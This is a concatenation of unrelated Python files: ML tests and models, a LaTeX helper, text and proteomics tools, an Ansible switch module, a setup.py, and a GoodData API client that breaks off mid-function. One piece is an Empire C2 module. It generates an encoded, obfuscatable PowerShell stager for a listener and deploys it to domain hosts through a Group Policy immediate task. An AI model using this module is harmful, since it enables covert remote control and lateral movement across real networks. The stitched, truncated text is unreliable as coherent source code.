# Tencent is pleased to support the open source community by making ncnn available.
#
# Copyright (C) 2021 THL A29 Limited, a Tencent company. All rights reserved.
#
# Licensed under the BSD 3-Clause License (the "License"); you may not use this file except
# in compliance with the License. You may obtain a copy of the License at
#
# https://opensource.org/licenses/BSD-3-Clause
#
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
import torch
import torch.nn as nn
import torch.nn.functional as F
class Model(nn.Module):
def __init__(self):
super(Model, self).__init__()
def forward(self, x, y, z, w):
x = F.relu(x)
y = F.relu(y)
z = F.relu(z)
w = F.relu(w)
return x, y, z, w
def test():
net = Model()
net.eval()
torch.manual_seed(0)
x = torch.rand(1, 16)
y = torch.rand(12, 2, 16)
z = torch.rand(1, 3, 12, 16)
w = torch.rand(1, 5, 7, 9, 11)
a0, a1, a2, a3 = net(x, y, z, w)
# export torchscript
mod = torch.jit.trace(net, (x, y, z, w))
mod.save("test_F_relu.pt")
# torchscript to pnnx
import os
os.system("../src/pnnx test_F_relu.pt inputshape=[1,16],[12,2,16],[1,3,12,16],[1,5,7,9,11]")
# pnnx inference
import test_F_relu_pnnx
b0, b1, b2, b3 = test_F_relu_pnnx.test_inference()
return torch.equal(a0, b0) and torch.equal(a1, b1) and torch.equal(a2, b2) and torch.equal(a3, b3)
if __name__ == "__main__":
if test():
exit(0)
else:
exit(1)
|
# AUTOGENERATED! DO NOT EDIT! File to edit: Discrminators.ipynb (unless otherwise specified).
__all__ = ['ProjectionDiscriminator', 'UnconditionalDiscriminator']
# Cell
#hide
from fastai import *
from fastai.vision import *
from fastai.callbacks import *
from fastai.utils.mem import *
from fastai.vision.gan import *
from PIL import Image
import numpy as np
import torch
import torch.nn.functional as F
import torch.nn as nn
from torch.nn import utils
from torch.nn import init
from torch.utils.data import DataLoader
from torch.utils.data.dataset import TensorDataset
import pdb
from .building_blocks import *
# Cell
class ProjectionDiscriminator(nn.Module):
"Projection based discrminator, adapted from: https://github.com/XHChen0528/SNGAN_Projection_Pytorch"
def __init__(self, num_feat=64, num_classes=0, activation=nn.ReLU()):
super().__init__()
self.num_feat = num_feat
self.num_classes = num_classes
self.activation = activation
# wrap the blocks in an nn.ModuleList so their parameters are registered with the module
self.blocks = nn.ModuleList([OptimizedBlock(3, num_feat)])
self.blocks.extend([
DisResBlock(num_feat*(2**i), num_feat*(2**(i+1)), downsample=True) for i in range(4)
])
self.l6 = torch.nn.utils.spectral_norm(nn.Linear(num_feat * 16, 1))
self.style = torch.nn.utils.spectral_norm(
nn.Linear(3, num_feat * 16))
self._initialize()
def _initialize(self):
init.xavier_uniform_(self.l6.weight.data)
optional_l_y = getattr(self, 'l_y', None)
if optional_l_y is not None:
init.xavier_uniform_(optional_l_y.weight.data)
def forward(self, x, y=None):
for block in self.blocks:
x = block(x)
h = self.activation(x)
h = torch.sum(h, dim=(2, 3))
output = self.l6(h)
if y is not None:
output += torch.sum(self.style(y) * h, dim=1, keepdim=True)
return output
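# --- Hedged usage sketch (not part of the original notebook export) ---
# Assumes OptimizedBlock/DisResBlock come from .building_blocks and keep doubling channels,
# so the sum-pooled feature h has num_feat * 16 channels regardless of input resolution.
if __name__ == "__main__":
    disc = ProjectionDiscriminator(num_feat=64)
    x = torch.randn(4, 3, 128, 128)   # image batch
    y = torch.randn(4, 3)             # conditioning vector fed to the projection head
    print(disc(x, y).shape)           # expected: torch.Size([4, 1])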
# Cell
class UnconditionalDiscriminator(nn.Module):
def __init__(self):
super().__init__()
self.model = nn.Sequential(
nn.Conv2d(3, 64, 3, 2, 1),
conv_and_res(64, 128),
conv_and_res(128, 256),
conv_and_res(256, 512),
nn.Conv2d(512, 1, 3, stride=1),
Flatten(),
nn.Linear(144, 1)
)
def forward(self, xb):
return self.model(xb)
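# --- Hedged usage sketch (not part of the original notebook export) ---
# Assumes conv_and_res (from .building_blocks) halves the spatial resolution, so a
# 3x224x224 input reaches the Flatten layer with 1 x 12 x 12 = 144 features,
# matching the nn.Linear(144, 1) head.
if __name__ == "__main__":
    disc = UnconditionalDiscriminator()
    xb = torch.randn(2, 3, 224, 224)
    print(disc(xb).shape)   # expected: torch.Size([2, 1])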
|
from typing import Optional
from pyexlatex.models.item import (
StringAdditionMixin,
IsSpecificClassMixin,
IsLatexItemMixin,
_basic_item_str,
_multi_option_item_str,
ItemBase
)
class LineSpacing(ItemBase):
def __init__(self, line_spacing: float):
self.logical_line_spacing = line_spacing
self.latex_line_spacing = latex_line_spacing_from_logical_line_spacing(line_spacing)
super().__init__()
@property
def name(self):
if self.logical_line_spacing == 2:
return 'doublespacing'
if self.logical_line_spacing == 1.5:
return 'onehalfspacing'
if self.logical_line_spacing == 1:
return 'singlespacing'
else:
return 'setstretch'
@property
def _options_str(self) -> str:
if self.logical_line_spacing in (1, 1.5, 2):
return ''
return f'{self.latex_line_spacing}'
def __str__(self):
options = self._options_str
if options:
return _basic_item_str(self.name, options)
return _multi_option_item_str(self.name)
def latex_line_spacing_from_logical_line_spacing(line_spacing: float) -> float:
"""
Latex for some reason has 1.65 as double line spacing, 1.325 as one and a half
line spacing, and 1 as single spacing. Take an input on a normal scale (2 is
double spaced, 1 is single space, 1.5 is one and a half spacing, and so on), and
convert to the latex scale.
Args:
line_spacing:
Returns:
"""
return round((line_spacing - 1) * (0.65/1) + 1, 2)
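# Hedged illustration (not part of the package): a quick check of the mapping above,
# e.g. 1.0 -> 1.0 and 2.0 -> 1.65, with intermediate values interpolated linearly.
if __name__ == "__main__":
    for logical in (1.0, 1.15, 1.5, 2.0):
        print(logical, latex_line_spacing_from_logical_line_spacing(logical))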
|
#!/usr/bin/env python
"""
Tool to pre-process documents contained in one or more directories, and export a document-term matrix for each directory.
"""
import os, os.path, sys, codecs
import logging as log
from optparse import OptionParser
import text.util
# --------------------------------------------------------------
def main():
parser = OptionParser(usage="usage: %prog [options] directory1 directory2 ...")
parser.add_option("--df", action="store", type="int", dest="min_df", help="minimum number of documents for a term to appear", default=10)
parser.add_option("--tfidf", action="store_true", dest="apply_tfidf", help="apply TF-IDF term weight to the document-term matrix")
parser.add_option("--norm", action="store_true", dest="apply_norm", help="apply unit length normalization to the document-term matrix")
parser.add_option("--minlen", action="store", type="int", dest="min_doc_length", help="minimum document length (in characters)", default=10)
parser.add_option("-s", action="store", type="string", dest="stoplist_file", help="custom stopword file path", default=None)
parser.add_option("-o","--outdir", action="store", type="string", dest="dir_out", help="output directory (default is current directory)", default=None)
parser.add_option("--ngram", action="store", type="int", dest="max_ngram", help="maximum ngram range (default is 1, i.e. unigrams only)", default=1)
# Parse command line arguments
(options, args) = parser.parse_args()
if( len(args) < 1 ):
parser.error( "Must specify at least one directory" )
log.basicConfig(level=20, format='%(message)s')
if options.dir_out is None:
dir_out = os.getcwd()
else:
dir_out = options.dir_out
# Load required stopwords
if options.stoplist_file is None:
stopwords = text.util.load_stopwords()
else:
log.info( "Using custom stopwords from %s" % options.stoplist_file )
stopwords = text.util.load_stopwords( options.stoplist_file )
# Process each directory
for in_path in args:
dir_name = os.path.basename( in_path )
# Read content of all documents in the directory
docgen = text.util.DocumentBodyGenerator( [in_path], options.min_doc_length )
docs = []
doc_ids = []
for doc_id, body in docgen:
docs.append(body)
doc_ids.append(doc_id)
log.info( "Found %d documents to parse" % len(docs) )
# Pre-process the documents
log.info( "Pre-processing documents (%d stopwords, tfidf=%s, normalize=%s, min_df=%d, max_ngram=%d) ..." % (len(stopwords), options.apply_tfidf, options.apply_norm, options.min_df, options.max_ngram ) )
(X,terms) = text.util.preprocess( docs, stopwords, min_df = options.min_df, apply_tfidf = options.apply_tfidf, apply_norm = options.apply_norm, ngram_range = (1,options.max_ngram) )
log.info( "Created %dx%d document-term matrix" % X.shape )
# Save the pre-processed documents
out_prefix = os.path.join( dir_out, dir_name )
text.util.save_corpus( out_prefix, X, terms, doc_ids )
# --------------------------------------------------------------
if __name__ == "__main__":
main()
|
from collections import OrderedDict
from app.dataformats import peptable as peptabledata
from app.actions.mergetable import (simple_val_fetch, fill_mergefeature,
get_isobaric_quant)
from app.actions.proteindata import create_featuredata_map
def build_peptidetable(pqdb, headerfields, isobaric=False,
precursor=False, fdr=False, pep=False,
genecentric=False):
"""Fetches peptides and quants from joined lookup table, loops through
them and when all of a peptide's quants/data have been collected, yields
peptide quant information."""
peptidedatamap = create_featuredata_map(pqdb, genecentric=genecentric,
psm_fill_fun=add_psm_to_peptidedata, pgene_fill_fun=add_protgene_to_pepdata,
is_peptides=True)
count_psms(peptidedatamap)
empty_return = lambda x, y, z: {}
iso_fun = {True: get_isobaric_quant, False: empty_return}[isobaric]
ms1_fun = {True: get_precursor_quant, False: empty_return}[precursor]
fdr_fun = {True: get_pep_fdr,
False: empty_return}[fdr]
pep_fun = {True: get_peptide_pep,
False: empty_return}[pep]
pdata_fun = get_protein_data
peptide_sql, sqlfieldmap = pqdb.prepare_mergetable_sql(precursor, isobaric,
probability=False,
fdr=fdr, pep=pep)
peptides = pqdb.get_merged_features(peptide_sql)
peptide = next(peptides)
outpeptide = {peptabledata.HEADER_PEPTIDE: peptide[sqlfieldmap['p_acc']]}
check_pep = {k: v for k, v in outpeptide.items()}
fill_mergefeature(outpeptide, iso_fun, ms1_fun, empty_return, fdr_fun,
pep_fun, pdata_fun, peptide, sqlfieldmap,
headerfields, peptidedatamap)
for peptide in peptides:
p_seq = peptide[sqlfieldmap['p_acc']]
if p_seq != outpeptide[peptabledata.HEADER_PEPTIDE]:
if outpeptide != check_pep:
yield outpeptide
outpeptide = {peptabledata.HEADER_PEPTIDE: p_seq}
check_pep = {k: v for k, v in outpeptide.items()}
fill_mergefeature(outpeptide, iso_fun, ms1_fun, empty_return, fdr_fun,
pep_fun, pdata_fun, peptide, sqlfieldmap,
headerfields, peptidedatamap)
yield outpeptide
def get_precursor_quant(peptide, sqlmap, headerfields):
return simple_val_fetch(peptide, sqlmap,
headerfields['precursorquant'][
peptabledata.HEADER_AREA], 'preq_val')
def get_pep_fdr(peptide, sqlmap, headerfields):
return simple_val_fetch(peptide, sqlmap,
headerfields['peptidefdr'][
peptabledata.HEADER_QVAL], 'fdr_val')
def get_peptide_pep(peptide, sqlmap, headerfields):
return simple_val_fetch(peptide, sqlmap,
headerfields['peptidepep'][
peptabledata.HEADER_PEP], 'pep_val')
def get_no_psms(peptide, pdata, headerfields):
hfields = [peptabledata.HEADER_NO_PSM,
]
seq = peptide[peptabledata.HEADER_PEPTIDE]
outdict = {}
for pool, psms in pdata[seq]['psms'].items():
pool_values = [psms]
outdict.update({headerfields['nopsms'][hfield][pool]: val
for (hfield, val) in zip(hfields, pool_values)})
return outdict
def get_protein_data(peptide, pdata, headerfields, accfield):
"""These fields are currently not pool dependent so headerfields
is ignored"""
report = get_proteins(peptide, pdata, headerfields)
return get_cov_descriptions(peptide, pdata, report)
def get_proteins(peptide, pdata, headerfields):
seq = peptide[peptabledata.HEADER_PEPTIDE]
outdict = {}
try:
proteins = ';'.join([x[0] for x in pdata[seq]['proteins']])
except TypeError:
pass
else:
outdict = {peptabledata.HEADER_PROTEINS: proteins}
for pool, psms in pdata[seq]['psms'].items():
outdict.update(
{headerfields['proteindata'][peptabledata.HEADER_NO_PSM][pool]:
psms})
return outdict
def get_cov_descriptions(peptide, pdata, report):
def format_val(value, valtype):
formatter = {int: lambda x: str(x),
float: lambda x: str(float(x)),
str: lambda x: x,
}
return formatter[valtype](value)
seq = peptide[peptabledata.HEADER_PEPTIDE]
for idx, key, keytype in zip([1, 2, 3, 4, 5],
[peptabledata.HEADER_COVERAGES,
peptabledata.HEADER_DESCRIPTIONS,
peptabledata.HEADER_GENES,
peptabledata.HEADER_ASSOCIATED,
peptabledata.HEADER_NO_CONTENTPROTEINS],
[float, str, str, str, int]):
try:
replist = [format_val(x[idx], keytype)
for x in pdata[seq]['proteins']]
except (TypeError, IndexError):
# index too high, or value is None: skip; item will be NA'ed downstream
continue
if key in [peptabledata.HEADER_GENES, peptabledata.HEADER_ASSOCIATED]:
replist = OrderedDict([(x, 1) for x in replist]).keys()
try:
report[key] = ';'.join(replist)
except TypeError:
# None in list, skip, NA will be output
continue
return report
def count_psms(pdata):
for seq in pdata:
for pool in pdata[seq]['psms']:
pdata[seq]['psms'][pool] = len(pdata[seq]['psms'][pool])
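# Hedged illustration of count_psms on hypothetical data: the PSM id sets collected per pool
# are replaced in place by their counts, e.g.
#     pdata = {'PEPTIDEK': {'psms': {'pool1': {'psm_1', 'psm_2'}, 'pool2': {'psm_3'}}}}
#     count_psms(pdata)
#     pdata['PEPTIDEK']['psms']  ->  {'pool1': 2, 'pool2': 1}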
def add_protgene_to_pepdata(peptidedata, seq, p_acc, dbrec, genecentric, pgcontentmap=None):
if genecentric == 'plain':
gene, desc, assoc_id, cov, pgcontent = None, dbrec[2], None, None, None
protein = (p_acc, cov, desc, gene, assoc_id)
elif genecentric:
gene = p_acc
desc, assoc_id = dbrec[2], dbrec[3]
cov, pgcontent = None, None
protein = (None, cov, desc, gene, assoc_id)
else:
desc, cov = dbrec[2], dbrec[3]
gene, assoc_id = dbrec[4], dbrec[5]
pgcontent = pgcontentmap[p_acc]
protein = (p_acc, cov, desc, gene, assoc_id, len(pgcontent))
try:
peptidedata[seq]['proteins'].add(protein)
except KeyError:
peptidedata[seq] = {'proteins': set()}
peptidedata[seq]['proteins'].add(protein)
def add_psm_to_peptidedata(peptidedata, p_acc, pool, psmdata):
seq, psm_id = psmdata[2], psmdata[3]
try:
peptidedata[seq]['psms'][pool].add(psm_id)
except KeyError:
try:
peptidedata[seq]['psms'][pool] = set()
except KeyError:
peptidedata[seq].update({'psms': {pool: set()}})
peptidedata[seq]['psms'][pool].add(psm_id)
|
from __future__ import print_function
import pathlib
from builtins import object
from builtins import str
from typing import Dict
from empire.server.common import helpers
from empire.server.common.module_models import PydanticModule
from empire.server.utils import data_util
from empire.server.utils.module_util import handle_error_message
class Module(object):
@staticmethod
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""):
# Set booleans to false by default
obfuscate = False
module_name = 'New-GPOImmediateTask'
listener_name = params['Listener']
user_agent = params['UserAgent']
proxy = params['Proxy']
proxy_creds = params['ProxyCreds']
if (params['Obfuscate']).lower() == 'true':
obfuscate = True
ObfuscateCommand = params['ObfuscateCommand']
if not main_menu.listeners.is_listener_valid(listener_name):
# not a valid listener, return nothing for the script
return handle_error_message("[!] Invalid listener: " + listener_name)
else:
# generate the PowerShell one-liner with all of the proper options set
launcher = main_menu.stagers.generate_launcher(listener_name, language='powershell', encode=True,
obfuscate=obfuscate, obfuscationCommand=ObfuscateCommand,
userAgent=user_agent, proxy=proxy, proxyCreds=proxy_creds,
bypasses=params['Bypasses'])
command = "/c \"" + launcher + "\""
if command == "":
return handle_error_message("[!] Error processing command")
else:
# read in the common powerview.ps1 module source code
module_source = main_menu.installPath + "/data/module_source/situational_awareness/network/powerview.ps1"
if main_menu.obfuscate:
obfuscated_module_source = module_source.replace("module_source", "obfuscated_module_source")
if pathlib.Path(obfuscated_module_source).is_file():
module_source = obfuscated_module_source
try:
with open(module_source, 'r') as f:
module_code = f.read()
except:
return handle_error_message("[!] Could not read module source path at: " + str(module_source))
if main_menu.obfuscate and not pathlib.Path(obfuscated_module_source).is_file():
script = data_util.obfuscate(installPath=main_menu.installPath, psScript=module_code,
obfuscationCommand=main_menu.obfuscateCommand)
else:
script = module_code
# get just the code needed for the specified function
script = helpers.generate_dynamic_powershell_script(module_code, module_name)
# build the command invocation in script_end so the dynamically extracted function above is kept
script_end = module_name + " -Command cmd -CommandArguments '" + command + "' -Force"
for option, values in params.items():
if option.lower() in ["taskname", "taskdescription", "taskauthor", "gponame", "gpodisplayname",
"domain", "domaincontroller"]:
if values and values != '':
if values.lower() == "true":
# if we're just adding a switch
script_end += " -" + str(option)
else:
script_end += " -" + str(option) + " '" + str(values) + "'"
outputf = params.get("OutputFunction", "Out-String")
script_end += f" | {outputf} | " + '%{$_ + \"`n\"};"`n' + str(module.name.split("/")[-1]) + ' completed!"'
if main_menu.obfuscate:
script_end = data_util.obfuscate(main_menu.installPath, psScript=script_end, obfuscationCommand=main_menu.obfuscateCommand)
script += script_end
script = data_util.keyword_obfuscation(script)
return script
|
import math
import IMLearn.learners.regressors.linear_regression
from IMLearn.learners.regressors import PolynomialFitting
from IMLearn.utils import split_train_test
import numpy as np
import pandas as pd
import plotly.graph_objects as go
import plotly.express as px
import plotly.io as pio
pio.templates.default = "simple_white"
def load_data(filename: str) -> pd.DataFrame:
"""
Load city daily temperature dataset and preprocess data.
Parameters
----------
filename: str
Path to house prices dataset
Returns
-------
Design matrix and response vector (Temp)
"""
# read file into dataframe
data = pd.read_csv(filename, parse_dates=True)
# value validation
data = data[data["Temp"] > -30]
data = data[data["Temp"] < 60]
# new features
data['DayOfYear'] = pd.to_datetime(data['Date']).dt.dayofyear
return data
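# Note (illustration): pd.to_datetime(...).dt.dayofyear maps e.g. "2020-02-01" to 32, so the
# DayOfYear column ranges from 1 to 365/366 and serves as the regressor in the plots below.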
if __name__ == '__main__':
np.random.seed(0)
# Question 1 - Load and preprocessing of city temperature dataset
df = load_data("../datasets/City_Temperature.csv")
# Question 2 - Exploring data for specific country
# temperatures in Israel as a function of Day Of Year
israel_df = df[df['Country'] == 'Israel']
graphs = []
#
for year in israel_df['Year'].unique():
df_per_year = israel_df[israel_df['Year'] == year]
y_temp = df_per_year['Temp']
graphs.append(go.Scatter(x=df_per_year['DayOfYear'],
y=y_temp,
mode='markers', name=f'{year}'))
#
fig = go.Figure(data=graphs)
fig.update_layout(
title="temperatures in Israel as a function of Day Of Year",
xaxis_title="day of year",
yaxis_title="temperatures",
height=600, width=1200)
fig.write_image("../exercises/temp.per.day.png")
# temperatures std in Israel as a function of months
fig = go.Figure(data=[go.Bar(x=list(range(1, 13)),
y=israel_df.groupby(['Month']).std()["Temp"])])
#
fig.update_layout(
title="temperatures std in Israel as a function of months",
xaxis_title="month",
yaxis_title="temperatures std")
fig.write_image("../exercises/temp.std.per.month.png")
# Question 3 - Exploring differences between countries
temp_statistic_df = df.groupby(['Country', 'Month']).Temp.agg([np.mean, np.std])
month_indices = temp_statistic_df.index.get_level_values('Month')
country_indices = temp_statistic_df.index.get_level_values('Country')
fig = px.line(temp_statistic_df,
x=month_indices,
y=temp_statistic_df['mean'],
error_y=temp_statistic_df['std'],
color=country_indices)
fig.update_layout(
title="mean temp +- std of all countries as a func of month",
xaxis_title="month",
yaxis_title="mean temp +- std")
fig.write_image("../exercises/mean.temp.for.each.coumtry.png")
# Question 4 - Fitting model for different values of `k`
# Randomly split the dataset into a training set (75%) and test set (25%)
sample_matrix = israel_df.drop("Temp", axis=1, inplace=False)
response = israel_df.Temp
train_X, train_y, test_X, test_y = split_train_test(sample_matrix, response)
# For every value k ∈ [1,10], fit a polynomial model of degree k using the training set
loss_list = []
min_loss, min_k = math.inf, 0
for k in range(1, 11):
poly_model = PolynomialFitting(k)
poly_model.fit(train_X["DayOfYear"], train_y)
# Record the loss of the model over the test set, rounded to 2 decimal places
loss = round(poly_model._loss(test_X["DayOfYear"], test_y), 2)
loss_list.append(loss)
if loss < min_loss: min_loss, min_k = loss, k # ensure the simplest model (min k)
print(f"loss of {k}-polynomial model over the test set: {loss}")
print(f"the optimal degree is: {min_k}, resulting in a loss of {min_loss}")
#plot
fig = go.Figure(data=[go.Bar(x=list(range(1, 11)),
y=loss_list)])
fig.update_layout(
title="loss of polynomial model as a func of polynomial degree k",
xaxis_title="k",
yaxis_title="loss of polynomial model")
fig.write_image("../exercises/loss.over.polynomial.degree.png")
# Question 5 - Evaluating fitted model on different countries
train_X, train_y = israel_df.drop('Temp', axis=1), israel_df.Temp
poly_model = PolynomialFitting(min_k)
poly_model.fit(train_X["DayOfYear"], train_y)
loss_list = []
for country in df['Country'].unique():
if country != "Israel":
country_df = df[df['Country'] == country]
loss = poly_model._loss(country_df["DayOfYear"], country_df.Temp)
loss_list.append(loss)
fig = go.Figure(data=[go.Bar(x=df[df['Country'] != 'Israel']['Country'].unique(),
y=loss_list)])
fig.update_layout(
title=f"polynomial fitting errors of countries other than Israel"
f"with the optimal degree {min_k} chosen in Israel subset fitting",
xaxis_title="country",
yaxis_title="loss of Polynomial fitting of degree k in israel")
fig.write_image("../exercises/countries.loss.over.min_k.png")
|
#!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: ce_snmp_location
version_added: "2.4"
short_description: Manages SNMP location configuration on HUAWEI CloudEngine switches.
description:
- Manages SNMP location configurations on HUAWEI CloudEngine switches.
author:
- wangdezhuang (@QijunPan)
options:
location:
description:
- Location information.
required: true
state:
description:
- Manage the state of the resource.
default: present
choices: ['present','absent']
'''
EXAMPLES = '''
- name: CloudEngine snmp location test
hosts: cloudengine
connection: local
gather_facts: no
vars:
cli:
host: "{{ inventory_hostname }}"
port: "{{ ansible_ssh_port }}"
username: "{{ username }}"
password: "{{ password }}"
transport: cli
tasks:
- name: "Config SNMP location"
ce_snmp_location:
state: present
location: nanjing China
provider: "{{ cli }}"
- name: "Remove SNMP location"
ce_snmp_location:
state: absent
location: nanjing China
provider: "{{ cli }}"
'''
RETURN = '''
changed:
description: check to see if a change was made on the device
returned: always
type: bool
sample: true
proposed:
description: k/v pairs of parameters passed into module
returned: always
type: dict
sample: {"location": "nanjing China",
"state": "present"}
existing:
description: k/v pairs of existing aaa server
returned: always
type: dict
sample: {}
end_state:
description: k/v pairs of aaa params after module execution
returned: always
type: dict
sample: {"location": "nanjing China"}
updates:
description: command sent to the device
returned: always
type: list
sample: ["snmp-agent sys-info location nanjing China"]
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.network.cloudengine.ce import get_config, load_config, ce_argument_spec
class SnmpLocation(object):
""" Manages SNMP location configuration """
def __init__(self, **kwargs):
""" Class init """
# module
argument_spec = kwargs["argument_spec"]
self.spec = argument_spec
self.module = AnsibleModule(argument_spec=self.spec, supports_check_mode=True)
# config
self.cur_cfg = dict()
# module args
self.state = self.module.params['state']
self.location = self.module.params['location']
# state
self.changed = False
self.updates_cmd = list()
self.results = dict()
self.proposed = dict()
self.existing = dict()
self.end_state = dict()
def check_args(self):
""" Check invalid args """
if self.location:
if len(self.location) > 255 or len(self.location) < 1:
self.module.fail_json(
msg='Error: The len of location %s is out of [1 - 255].' % self.location)
else:
self.module.fail_json(
msg='Error: The len of location is 0.')
def get_proposed(self):
""" Get proposed state """
self.proposed["state"] = self.state
if self.location:
self.proposed["location"] = self.location
def get_existing(self):
""" Get existing state """
tmp_cfg = self.cli_get_config()
if tmp_cfg:
temp_data = tmp_cfg.split(r"location ")
self.cur_cfg["location"] = temp_data[1]
self.existing["location"] = temp_data[1]
def get_end_state(self):
""" Get end state """
tmp_cfg = self.cli_get_config()
if tmp_cfg:
temp_data = tmp_cfg.split(r"location ")
self.end_state["location"] = temp_data[1]
def cli_load_config(self, commands):
""" Load config by cli """
if not self.module.check_mode:
load_config(self.module, commands)
def cli_get_config(self):
""" Get config by cli """
regular = "| include snmp | include location"
flags = list()
flags.append(regular)
tmp_cfg = get_config(self.module, flags)
return tmp_cfg
def set_config(self):
""" Set configure by cli """
cmd = "snmp-agent sys-info location %s" % self.location
self.updates_cmd.append(cmd)
cmds = list()
cmds.append(cmd)
self.cli_load_config(cmds)
self.changed = True
def undo_config(self):
""" Undo configure by cli """
cmd = "undo snmp-agent sys-info location"
self.updates_cmd.append(cmd)
cmds = list()
cmds.append(cmd)
self.cli_load_config(cmds)
self.changed = True
def work(self):
""" Main work function """
self.check_args()
self.get_proposed()
self.get_existing()
if self.state == "present":
if "location" in self.cur_cfg.keys() and self.location == self.cur_cfg["location"]:
pass
else:
self.set_config()
else:
if "location" in self.cur_cfg.keys() and self.location == self.cur_cfg["location"]:
self.undo_config()
self.get_end_state()
self.results['changed'] = self.changed
self.results['proposed'] = self.proposed
self.results['existing'] = self.existing
self.results['end_state'] = self.end_state
self.results['updates'] = self.updates_cmd
self.module.exit_json(**self.results)
def main():
""" Module main """
argument_spec = dict(
state=dict(choices=['present', 'absent'], default='present'),
location=dict(type='str', required=True)
)
argument_spec.update(ce_argument_spec)
module = SnmpLocation(argument_spec=argument_spec)
module.work()
if __name__ == '__main__':
main()
|
from setuptools import setup
import versioneer
requirements = [
# package requirements go here
]
setup(
name='sqlerandxmler',
version=versioneer.get_version(),
cmdclass=versioneer.get_cmdclass(),
description="Execute queries and parse XMLs",
license="MIT",
author="Alex Nally",
author_email='alexjnally@gmail.com',
url='https://github.com/alexjnally/sqlerandxmler',
packages=['sqlerandxmler'],
entry_points={
'console_scripts': [
'sqlerandxmler=sqlerandxmler.cli:cli'
]
},
install_requires=requirements,
keywords='sqlerandxmler',
classifiers=[
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
]
)
|
import os
import json
import requests
import time
import logging
api_domain = os.getenv('GOODDATA_DOMAIN')
api_url = api_domain + "/gdc/projects/" + os.getenv('GOODDATA_PROJECT')
def auth_cookie():
sst = super_secured_token()
temp_token = temporary_token(sst)
return temp_token
def get_username():
if os.getenv('GOODDATA_USER') is None:
raise ValueError(
"Please set your env var GOODDATA_USER"
)
else:
return os.getenv('GOODDATA_USER')
def get_password():
if os.getenv('GOODDATA_PASSWORD') is None:
raise ValueError(
"Please set your env var GOODDATA_PASSWORD"
)
return os.getenv('GOODDATA_PASSWORD')
def get_useragent():
return "PyGyver-ETL/1.0"
def super_secured_token():
"""
Sends username and password to POST requests
verify_level - 0: HTTP Cookie, use GDCAuthSST in header
- 2: custom HTTP header, use X-GDC-AuthSST in header (selected)
Returns
-------
sst (string) - SuperSecured Token
"""
url = os.getenv('GOODDATA_DOMAIN') + "/gdc/account/login/"
values = json.dumps({"postUserLogin": {"login": get_username(),
"password": get_password(),
"remember": 1,
"verify_level": 2
}
})
headers = {
"Accept": "application/json",
"Content-Type": "application/json",
"User-Agent": get_useragent(),
}
response = requests.post(
url=url,
data=values,
headers=headers
)
# Check response's Status Code
if 200 <= response.status_code < 300:
content = json.loads(response.content)
sst_cookie = response.headers['X-GDC-AuthSST']
else:
raise ValueError(json.loads(response.content))
return sst_cookie
def temporary_token(sst):
"""
Include the returned TT (Temporary Token) when making API calls
to the GoodData Platform.
The TT is valid for a short period of time. If you receive status code
401 (Unauthorized) while calling any API resource, get a new TT -- the
SST must still be valid; its lifetime is controlled by the 'remember' option.
Parameters
----------
sst (string)
Returns
-------
"""
url = os.getenv('GOODDATA_DOMAIN') + "/gdc/account/token/"
headers = {
"Accept": "application/json",
"Content-Type": "application/json",
"User-Agent": get_useragent(),
"X-GDC-AuthSST": sst
}
response = requests.get(
url=url,
headers=headers
)
# Check response's Status Code
if 200 <= response.status_code < 300:
content = json.loads(response.content)
temp_token = content['userToken']['token']
else:
raise ValueError(response.content)
return temp_token
def get_header():
header = {
"Accept": "application/json",
"Content-Type": "application/json",
"User-Agent": get_useragent(),
"X-GDC-AuthTT": auth_cookie()
}
return header
def api_get_schedules():
uri = "/schedules?state=ENABLED&statuses=RUNNING"
response = requests.get(
url=api_url + uri,
headers=get_header()
)
return response
def api_post_execution(data, schedule_id):
uri = "/schedules/" + schedule_id + "/executions"
response = requests.post(
url=api_url + uri,
data=data,
headers=get_header()
)
return response
def api_get_status(uri):
response = requests.get(
url=api_domain + uri,
headers=get_header()
)
return response
def no_running_add_schedules(await_completion):
""" Checks for running GoodData ADD schedules.
Returns:
- True if there are no GoodData ADD schedules currently running
- False if there is currently a GoodData ADD schedule running
Usage:
- no_running_add_schedules()
"""
if await_completion:
response = api_get_schedules()
content = json.loads(response.content)
schedules = content['schedules']['items']
for schedule in schedules:
params = schedule['schedule']['params']
if 'GDC_DATALOAD_DATASETS' in params:
return False
return True
else:
return True
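# Note: api_get_schedules() already filters on state=ENABLED and RUNNING status, so returning
# False above means an ADD schedule (one carrying GDC_DATALOAD_DATASETS params) is still running.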
def execute_schedule(schedule_id, retry=False, await_completion=False, force_full_load=False):
""" Executes GoodData schedule.
Parameters:
- schedule_id (string): The ID of the GoodData schedule you want to execute.
- retry (boolean): If True, applies the reschedule property if the schedule has it set. When not set, defaults to False.
- await_completion (boolean): If True, waits for other add schedules to finish running.
- force_full_load (boolean): If True, forces load to be FULL no matter the original setting, ADD schedules only.
Required:
- GOODDATA_DOMAIN - Usually http://reports.made.com
- GOODDATA_PROJECT - The GoodData Project ID
- GOODDATA_USER - The login credentials for GoodData Report
- GOODDATA_PASSWORD - The login credentials for GoodData Report
Returns:
- URI link to schedule execution.
Usage:
- execute_schedule("a1bc3xyz", retry=True)
"""
if os.getenv('GOODDATA_DOMAIN') is None:
raise ValueError(
"Please set your env var GOODDATA_DOMAIN"
)
if os.getenv('GOODDATA_PROJECT') is None:
raise ValueError(
"Please set your env var GOODDATA_PROJECT"
)
params_dict={}
params_dict["retry"] = str(retry).lower()
if force_full_load:
params_dict["GDC_DATALOAD_SINGLE_RUN_LOAD_MODE"] = "FULL"
values = json.dumps({
"execution": {
"params": params_dict
}
})
while True:
